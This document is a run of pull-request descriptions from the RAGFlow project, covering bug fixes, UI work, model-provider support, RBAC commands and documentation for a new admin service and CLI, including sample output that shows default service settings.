### What problem does this PR solve?
fix(edit-tag): Fix the bug that the edit-tag tag cannot be deleted #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#7472](https://github.com/infiniflow/ragflow/issues/7472)
change:
Vision Model Image Enhancement in Manual chunker
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Qwen-VL series supports video parsing. #10617.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimize code and fix ts type errors #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The agent dialogue sheet does not display the opening remarks.
#10664
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Remove pdf embed support, update based on #10635
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add comprehensive RBAC support with role and permission management
- Implement CREATE/ALTER/DROP ROLE commands for role lifecycle
management
- Add GRANT/REVOKE commands for fine-grained permission control
- Support user role assignment via ALTER USER SET ROLE command
- Add SHOW ROLE and SHOW USER PERMISSION for permission inspection
- Implement corresponding RESTful API endpoints for role management
- Integrate role commands into existing command execution framework
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix:Text color in Floating Widget (Intercom-style) #10624
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the pipeline on the agent canvas #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
File: Now parsing support all types of embedded documents, solved #10059
Fix: Incomplete words in chat #10530
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Restore the sidebar description of DP slicing method #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete useless files from the data pipeline #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#9004](https://github.com/infiniflow/ragflow/issues/9004)
change:
VolcEngine Model type add IMAGE2TEXT
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(storybook): Storybook with Calendar and Modal components #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Clear agents display, remove empty value column.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add MinerU parser. #3945, #8092.
Set `MINERU_EXECUTABLE` to the MinerU executable path, defaults to
`mineru`.
Set `MINERU_DELETE_OUTPUT=0` to preserve MinerU's output, default is 1,
which deletes temporary output.
Set `MINERU_OUTPUT_DIR` to choose the MinerU output directory (uses the
temporary directory if unset).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Open the parser operator configuration, save it, and run the agent.
An error will be reported. #10615
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: add forgot password reset (update naming style), solve #8547
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The bottom anchor of the agent node is only displayed when there
is a downstream node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Bug fixes#9869
- Added the disabled attribute to control the modal confirmation button
state
- Conditionally rendered the catalog enhancement toggle component
- Replaced the selector component and removed unused imports
- Removed redundant catalog enhancement text in the Chinese language
pack
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Collapse the excess portion of the tool node and retrieval node
#9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
## What problem does this PR solve?
Fixes the PostgreSQL connection error that prevents RAGFlow from
starting:
peewee.ProgrammingError: invalid dsn: invalid connection option
"max_retries"
## Problem Analysis
The `BaseDataBase` class in `api/db/db_models.py` adds `max_retries` and
`retry_delay` to the database configuration dict before passing it to
the database connection constructor.
- **MySQL**: Has `RetryingPooledMySQLDatabase` class that properly
extracts these custom parameters using `kwargs.pop()` before calling the
parent constructor
- **PostgreSQL**: Was using the base `PooledPostgresqlDatabase` class
which passes all parameters directly to `psycopg2.connect()`, which
doesn't recognize `max_retries` as a valid connection option
## Solution
Created `RetryingPooledPostgresqlDatabase` class that:
- Extracts `max_retries` and `retry_delay` parameters before
initialization
- Implements retry logic with exponential backoff for connection
failures
- Handles PostgreSQL-specific connection errors (connection refused,
server closed, etc.)
- Mirrors the existing `RetryingPooledMySQLDatabase` implementation
Updated the `PooledDatabase` enum to use the new retrying class for
PostgreSQL.
## Benefits
✅ Prevents invalid connection parameters from being passed to psycopg2
✅ Adds automatic retry logic for PostgreSQL connection failures
✅ Provides better error logging for PostgreSQL-specific issues
✅ Maintains consistency between MySQL and PostgreSQL database handling
## Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
## Testing
Tested with PostgreSQL database configuration and verified:
- Server starts without the "invalid dsn" error
- Database connections are established successfully
- Retry logic works correctly on connection failures
Co-authored-by: Andrea Bugeja <andrea.bugeja@gig.com>
### What problem does this PR solve?
Feat: add forgot password reset, solve #8547
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Update architecture image
2. ragflow-cli doesn't indicate the version
### Type of change
- [x] Documentation Update
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Added new field 'toc_kwd' to infinity_mapping.json for table of
contents keyword support
- Changed page_num_int from integer to array type in task_executor.py to
handle multiple page numbers
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix (dataset setting): Remove the introduction and use of TagItems in
the configuration. #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#5787](https://github.com/infiniflow/ragflow/issues/5787)
change:
Support Specifying OpenRouter Model Provider
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Improve file management. #10287.
Passed tests:
1. Create folder `A` and `B`.
2. Upload a file inside `A`, called `file`.
3. Create a KB, called `K`.
3. Link `file` to `K`.
4. Parse `file` inside of `K`. (OK)
5. Move `file` from `A` to `B`.
6. Parse `file` inside of `K`. (OK)
7. Move `file` from `B` to `A`.
8. Parse `file` inside of `K`. (OK)
9. Move entire folder `A` into `B`. (B -> A -> file)
10. Parse `file` inside of `K`. (OK)
11. Delete folder `B`.
12. All clear. (There is no document inside of `K`)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Don't need rerank for infinity since Infinity normalizes each way score
before fusion.
### Type of change
- [x] Refactoring
…tionality
### What problem does this PR solve?
Fix (i18n): Update the Chinese and English description of RAPTOR
functionality #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Since `description_list` was a tuple containing a single element (which
was the actual list of descriptions), `len(description_list)` was always
**1**.
The subsequent check:
`if len(description_list) <= 12:` always evaluated to `True` (since $1
\le 12$), even if the inner list contained more than 12 descriptions.
This prevented the necessary summarization logic from running for long
lists.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
As title.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: Optimize metadata filters, add Ingestion pipeline options to agent
templates page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Creating a data flow from a template page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.5 to v0.21.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Click the reset button on the agent page shared externally, and the
greeting in conversation mode should not be deleted. #10567
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
ini
### What problem does this PR solve?
Create Stock_research_report.json
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Adding Ingestion Pipeline Classification to Agents Template #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: When I click to interrupt the chat, the page reports an error
#10553
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Switch the default theme from light mode to dark mode and improve
some styles #9869
-Update UI component styles such as input boxes, tables, and prompt
boxes
-Optimize login page layout and style details
-Revise some of the wording, such as uniformly changing "data flow" to
"pipeline"
-Adjust the parser to support the markdown type
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of note nodes #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Merge splitter and hierarchicalMerger into one node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…pdate comand
### What problem does this PR solve?
To make the CLI easy to use.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Update the parsing editor to support dynamic field names and
optimize UI styles #9869
-Modify the default background color of UI components such as Input and
Select to 'bg bg base'`
-Remove TagItems component reference from naive configuration page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the configuration of data flow operators on the node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
add kibana tool in the docker compose file(#10525)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
issue:
#10495
change:
fix empty references in agent conversation
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Solved: Sync Parse Document API #5635
Feat: Add parse_document with feed back, user can view the status of
each document after parsing finished.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
Fix: XSS vulnerability in Ragflow's chat view
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Merge title splitter and token splitter into chunker category
#9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimized the login page and fixed some known issues. #9869
- Added the FlipCard3D component to implement a 3D flip effect on the
login/registration forms.
- Adjusted the Spotlight component to support custom positioning and
color configurations.
- Updated the route to point to the new login page /login-next.
- Added a cancel interface to the auto-generate function.
- Fixed scroll bar issues in PDF preview.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The Context Generator node can only be followed by a Tokenizer and
a Context Generator. #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Update lm studio models support, refer to #8116
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
### What problem does this PR solve?
issue:
[#10296](https://github.com/infiniflow/ragflow/issues/10296)
change:
- ExeSQL: support connecting to Trino.
- Validation: password can be empty only when db_type === "trino";
all other database types keep the existing requirement (non-empty).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Maintain backward compatibility for KB tasks
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the background color of the canvas #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix issues:https://github.com/infiniflow/ragflow/issues/10402
As the newly distributed embedding models support vector dimensions max
to 4096, while current OpenSearch's max dimension support is 1536.
As I tested, the 4096-dimensions vector will be treated as a float type
which is unacceptable in OpenSearch.
Besides, OpenSearch supports max to 16000 dimensions by defalut with the
vector engine(Faiss). According to:
https://docs.opensearch.org/2.19/field-types/supported-field-types/knn-methods-engines/
I added max to 10240 dimensions support for OpenSearch, as I think will
be sufficient in the future.
As I tested , it worked well on my own server (treated as knn_vector)by
using qwen3-embedding:8b as the embedding model:
<img width="1338" height="790" alt="image"
src="https://github.com/user-attachments/assets/a9b2d284-fcf6-4cea-859a-6aadccf36ace"
/>
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
By the way, I will still focus on the stuff about
Elasticsearch/Opensearch as search engines and vector databases.
Co-authored-by: 张雨豪 <zhangyh80@chinatelecom.cn>
### What problem does this PR solve?
Fix: Added table of contents extraction functionality and optimized form
item layout #9869
- Added `EnableTocToggle` component to toggle table of contents
extraction on and off
- Added multiple parser configuration components (such as naive, book,
laws, etc.), displaying different parser components based on built-in
slicing methods
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the default style of the agent node anchor #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#6571](https://github.com/infiniflow/ragflow/issues/6571)
change:
include author, journal name, volume, issue, page, and DOI in PubMed
search results
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refactor(login): Refactor the login page and add dynamic background and
highlight effects #9869
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Fixed the issue where the connection lines of placeholder nodes in
the agent canvas could not be displayed #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Gemini 2.5 Flash Models use reasoning by default. There is currently no
way to disable this behaviour. This leads to very long response times (>
1min). The default behaviour should be, that reasoning is disabled and
configurable
issue #10474
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes the return type annotation for the `get_urls` function in
`download_deps.py`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Agent.reset() argument wrong #10463 & Unable to converse with agent
through Python API. #10415
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the delete button on the agent side #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Google Cloud model does not work correctly with gemini-2.5 models
Close#10408
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Fixed the issue where swagger apidocs could not be opened
properly(#9522)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
Feat: Added toc enhance field to chat and retrieval operator
configuration #10436
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Bug fixes#9869
- Adjusted the breadcrumb display logic on the data flow results page
- Added the default display of "Local Upload" to the Source field in the
dataset overview table
- Replaced the original Mindmap Task field with the GraphRAG Task field
on the dataset settings page
- Optimized the build button status check criteria and adjusted the
progress information display logic
- Introduced a Tooltip in the parsing status cell component and removed
redundant Button components
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#6193](https://github.com/infiniflow/ragflow/issues/6193)
change:
support qwq reasoning models with non-stream output
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed an issue where parser configurations could be added
infinitely #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the operator added by clicking the plus sign
in the data flow would overlap with the original section #9886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add prompts for toc relevance check according to #10436
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: add total in List dataset API, solved #10360
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Running DeepDoc OCR on large PDFs inside the GPU docker-compose setup
would intermittently fail with
[ONNXRuntimeError] ... p2o.Clip.6 ... Available memory of 0 is smaller
than requested bytes ...
- Root cause: load_model() in deepdoc/vision/ocr.py treated
device_id=None as-is.
torch.cuda.device_count() > device_id then raised a TypeError, the
helper returned False, and ONNXRuntime quietly fell back to
CPUExecutionProvider with
the hard-coded 512 MB limit, which then triggered the allocator failure.
- Environment where this reproduces: Windows 11, AMD 5900x, 64 GB RAM,
RTX 3090 (24 GB), docker-compose-gpu.yml from upstream, default DeepDoc
+ GraphRAG
parser settings, ingesting heavy PDF such as 《内科学》(第10版).pdf (~180 MB).
Fixes:
- Normalize device_id to 0 when it is None before calling any CUDA APIs,
so the GPU path is considered available.
- Allow configuring the CUDA provider’s memory cap via
OCR_GPU_MEM_LIMIT_MB (default 2048 MB) and expose
OCR_ARENA_EXTEND_STRATEGY; the calculated byte
limit is logged to confirm the effective settings.
After the change, ragflow_server.log shows for example
load_model ... uses GPU (device 0, gpu_mem_limit=21474836480,
arena_strategy=kNextPowerOfTwo) and the same document finishes OCR
without allocator errors.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Importing data flow files from the list page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Replace the collapse icon #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#10417](https://github.com/infiniflow/ragflow/issues/10417)
change:
Adjusted the `searxng_url` priority logic to ensure the
frontend-provided URL takes precedence over the model’s default
configuration. This allows user-specified SearXNG endpoints to be
correctly applied during execution, improving flexibility across
different environments.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the translation file of the workflow #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
**Adds a new feature that enables the LLM to extract a structured table
of contents (TOC) directly from plain text.**
_This implementation prioritizes efficiency over reasoning — the model
runs in a strictly deterministic mode (thinking disabled) to minimize
latency.
As a result, overall performance may be less optimal, but the extraction
speed and consistency are guaranteed._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related issues
#10078
### What problem does this PR solve?
Integrate DeerAPI provider.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Co-authored-by: DeerAPI <tensor.null@gmail.com>
### What problem does this PR solve?
Hi team, @ZhenhangTung @KevinHuSh @cike8899
About #10384 , I've completed the UI optimization adjustments for the
Agent page according to our previous discussions and the design draft
sketches provided by @Naomi. The main modifications include:
1. Adjusted the style and content of placeholder-node.
2. Adjusted the location of the dropdown (to the right of the
placeholder-node) .
3. Adjusted the tooltip position spacing when the mouse hovers in the
dropdown menu.
4. Hides the thick scroll bar on the dropdown component.
5. Highlight the connection line when dragging to generate a
placeholder-node
<img width="1323" height="509" alt="Image"
src="https://github.com/user-attachments/assets/0d366f7f-477d-4c00-bb58-d5d58b3a745f"
/>
Please review the related code modifications when you have time. Let me
know if further adjustments are needed!
Thanks!
### Type of change
- [x] Other (please describe): UI Enhancement
---------
Co-authored-by: leonlai <leonlai@futurefab.ai>
### What problem does this PR solve?
- Admin service support SHOW SERVICE <id>.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
issue: #10241
### What problem does this PR solve?
issue:
[Question]: New Chat Creation Renames Edited Chat Instead of Creating a
New One #10373
change:
reset chat state when creating new dialog
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Unexpected operation of document management.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add support for LongCat-Flash-Thinking and Claude Sonnet 4.5.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for international Dashscope service. #10340
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add baseUrl to the Tongyi Qianwen model configuration modal #10340
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
About issue #10140
In version 0.20.1, we implemented the generation of new node through
mouse drag and drop. If we could create a workflow module like in Coze,
where there is not only a dropdown menu but also an intermediate node
(placeholder node) after the drag and drop is completed, this could
improve the user experience.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Admin client support drop user.
Issue: #10241
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix unexpected operation of file management.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The dataset uses the new id to obtain the knowledge graph #10333
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR addresses [issue
#9962](https://github.com/infiniflow/ragflow/issues/9962).
It updates the Japanese translations in `web/src/locales/ja.ts`.
For this contribution, the scope is intentionally limited to **Chat**
and **Knowledge Base** related UI texts, ensuring focused and
incremental improvement without affecting other modules.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
These changes are intended to implement the remaining functionalities of
the fullscreen widget.
The question arises: how to display document prieview of PDFs in this
floating widget?
- simply enlarge the widget window
- implement zoom in/out
- render outside the iframe?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
#10326
change:
remove ibm-db dependency and refactor import order
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The enterprise version of the knowledge graph cannot be displayed.
#10333
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:#5617
change:add IBM DB2 support in ExeSQL
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Rename the CometEmbed and CometSeq2txt classes to CometAPIEmbed and
CometAPISeq2txt, and correct supported_models.mdx.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Move base64 related function to api/common/base64.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Refactor import modules.
### Type of change
- [x] Refactoring
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fixed the issue where database connections were interrupted under high
concurrency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: lemsn <lemsn@126.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Added "怎么办" to the regex pattern in rmWWW method to improve query
cleaning by removing this common question phrase along with other
question words.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Admin client support show user and create user command.
- Admin client support alter user password and active status.
- Admin client support list user datasets.
issue: #10241
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix invalid COMPONENT_EXEC_TIMEOUT. #10273
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Move base64 related function to api/common/base64.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
### What problem does this PR solve?
1. Fix typos
2. Rename function
3. Use English to write comment
### Type of change
- [x] Refactoring
Signed-off-by: jinhai <haijin.chn@gmail.com>
…rsation_app.py
### What problem does this PR solve?
issue:
#10188
change:
This PR replaces traceback.print_exc() with logging.exception(e) in
conversation_app.py to ensure that full error tracebacks are captured by
the logging system instead of being written only to stderr.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Wrong Qwen models's ID
[Bug]: ERROR: litellm.NotFoundError: DashscopeException - The model
Qwen/Qwen3-Omni-Flash does not exist or you do not have access to it.
change: delete wrong qwen model id
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Add Russian language
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[Bug]: ERROR: list index out of range #10188
change:
fix a potential list index out of range error in chat response parsing
by adding explicit checks for empty choices.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Revert back to chat.completions.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe):
Revert back to chat.completions.
### What problem does this PR solve?
Currently, Azure OpenAI returns one minute Quota limit responses when
chat API is utilized. This change is needed in order to be able to
process almost any documents using models deployed in Azure Foundry.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix broken imports
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Signed-off-by: jinhai <haijin.chn@gmail.com>
### What problem does this PR solve?
An error occurred while merging strings containing '\m' in the Text
Processing function of the agent.
Convert \ m to m using regular expressions
From my example alone, it doesn't affect the original meaning, it's
still math
<img width="1227" height="1056" alt="image"
src="https://github.com/user-attachments/assets/9306a8ca-bb97-47bf-b91f-77acfce49875"
/>
### Type of change
- [ √ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: mxc <mxc@example.com>
### What problem does this PR solve?
Fix: resolve hash collisions by switching to UUID &correct logic for
always-true statements, solved: #10165
Feat: Update GPT api integration, solved: #10204
Feat: Support qianwen-deepresearch, solved: #10163
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add tree_merge for law parsers, significantly outperforming
hierarchical_merge, solved: #8637
1. Add tree_merge for law parsers, include build_tree and get_tree by
dfs.
2. add Copyright statement for helath_utils
### Type of change
- [x] Documentation Update
- [x] Performance Improvement
### What problem does this PR solve?
Add a chat widget. I'll probably need some assistance to get this ready
for merge!
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Mohamed Mathari <nocodeventure@Mac-mini-van-Mohamed.fritz.box>
### What problem does this PR solve?
Introduce new feature: RAGFlow system admin service and CLI
### Introduction
Admin Service is a dedicated management component designed to monitor,
maintain, and administrate the RAGFlow system. It provides comprehensive
tools for ensuring system stability, performing operational tasks, and
managing users and permissions efficiently.
The service offers monitoring of critical components, including the
RAGFlow server, Task Executor processes, and dependent services such as
MySQL, Infinity / Elasticsearch, Redis, and MinIO. It automatically
checks their health status, resource usage, and uptime, and performs
restarts in case of failures to minimize downtime.
For user and system management, it supports listing, creating,
modifying, and deleting users and their associated resources like
knowledge bases and Agents.
Built with scalability and reliability in mind, the Admin Service
ensures smooth system operation and simplifies maintenance workflows.
It consists of a server-side Service and a command-line client (CLI),
both implemented in Python. User commands are parsed using the Lark
parsing toolkit.
- **Admin Service**: A backend service that interfaces with the RAGFlow
system to execute administrative operations and monitor its status.
- **Admin CLI**: A command-line interface that allows users to connect
to the Admin Service and issue commands for system management.
### Starting the Admin Service
1. Before start Admin Service, please make sure RAGFlow system is
already started.
2. Run the service script:
```bash
python admin/admin_server.py
```
The service will start and listen for incoming connections from the CLI
on the configured port.
### Using the Admin CLI
1. Ensure the Admin Service is running.
2. Launch the CLI client:
```bash
python admin/admin_client.py -h 0.0.0.0 -p 9381
## Supported Commands
Commands are case-insensitive and must be terminated with a semicolon
(`;`).
### Service Management Commands
- [x] `LIST SERVICES;`
- Lists all available services within the RAGFlow system.
- [ ] `SHOW SERVICE <id>;`
- Shows detailed status information for the service identified by
`<id>`.
- [ ] `STARTUP SERVICE <id>;`
- Attempts to start the service identified by `<id>`.
- [ ] `SHUTDOWN SERVICE <id>;`
- Attempts to gracefully shut down the service identified by `<id>`.
- [ ] `RESTART SERVICE <id>;`
- Attempts to restart the service identified by `<id>`.
### User Management Commands
- [x] `LIST USERS;`
- Lists all users known to the system.
- [ ] `SHOW USER '<username>';`
- Shows details and permissions for the specified user. The username
must be enclosed in single or double quotes.
- [ ] `DROP USER '<username>';`
- Removes the specified user from the system. Use with caution.
- [ ] `ALTER USER PASSWORD '<username>' '<new_password>';`
- Changes the password for the specified user.
### Data and Agent Commands
- [ ] `LIST DATASETS OF '<username>';`
- Lists the datasets associated with the specified user.
- [ ] `LIST AGENTS OF '<username>';`
- Lists the agents associated with the specified user.
### Meta-Commands
Meta-commands are prefixed with a backslash (`\`).
- `\?` or `\help`
- Shows help information for the available commands.
- `\q` or `\quit`
- Exits the CLI application.
## Examples
```commandline
admin> list users;
+-------------------------------+------------------------+-----------+-------------+
| create_date | email | is_active | nickname |
+-------------------------------+------------------------+-----------+-------------+
| Fri, 22 Nov 2024 16:03:41 GMT | jeffery@infiniflow.org | 1 | Jeffery |
| Fri, 22 Nov 2024 16:10:55 GMT | aya@infiniflow.org | 1 | Waterdancer |
+-------------------------------+------------------------+-----------+-------------+
admin> list services;
+-------------------------------------------------------------------------------------------+-----------+----+---------------+-------+----------------+
| extra | host | id | name | port | service_type |
+-------------------------------------------------------------------------------------------+-----------+----+---------------+-------+----------------+
| {} | 0.0.0.0 | 0 | ragflow_0 | 9380 | ragflow_server |
| {'meta_type': 'mysql', 'password': 'infini_rag_flow', 'username': 'root'} | localhost | 1 | mysql | 5455 | meta_data |
| {'password': 'infini_rag_flow', 'store_type': 'minio', 'user': 'rag_flow'} | localhost | 2 | minio | 9000 | file_store |
| {'password': 'infini_rag_flow', 'retrieval_type': 'elasticsearch', 'username': 'elastic'} | localhost | 3 | elasticsearch | 1200 | retrieval |
